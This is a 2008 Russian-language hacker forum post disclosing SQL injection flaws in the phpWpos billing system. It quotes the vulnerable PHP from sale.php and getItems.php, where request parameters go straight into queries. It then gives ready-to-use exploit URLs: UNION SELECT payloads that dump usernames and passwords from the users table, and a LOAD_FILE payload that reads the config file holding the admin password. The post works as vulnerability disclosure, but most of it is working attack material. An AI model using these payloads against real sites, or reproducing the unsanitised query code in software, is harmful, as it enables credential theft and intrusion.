Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

18.02.2008, 19:41
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме: 7192869
Репутация:
3033
|
|
phpWpos bugs
{Некоторые уязвимости в биллинг системе phpWpos}
Офиц. сайт: http://phpwpos.sourceforge.net/
1)Sql inj в скрипте sale.php
PHP код:
<?php
$sql = "select date, sale_sub_total, sale_total_cost from sales where id=" .$_GET['id'];
$result = $db->query($sql);
$sales_info = mysql_fetch_row($result);
?>
Эксплойт
Код:
http://localhost/wostest/sale.php?id=2+union+select+concat(password,0x3a,username),2,3+from+users/*
2)Sql inj в скрипте getItems.php
PHP код:
$db = new database($dbhost,$dbuser,$dbpassword,$dbname);
$result = $db->query("select id, item_name, image, buy_price, unit_price, tax_percent, total_cost from items where category_id=" .$_GET['category']);
Эксплойт:
Код:
http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a3a3a,id,first_name,last_name,username,password,type)+from+users/*
{Трабла}
Парль администратора в БД не содержится, он прописан в конфиге. Для эксплуатации уязвимости требуется: file_priv = Y
Эксплойт
http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,LOAD_FILE('\path\site\c onfig.php')/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|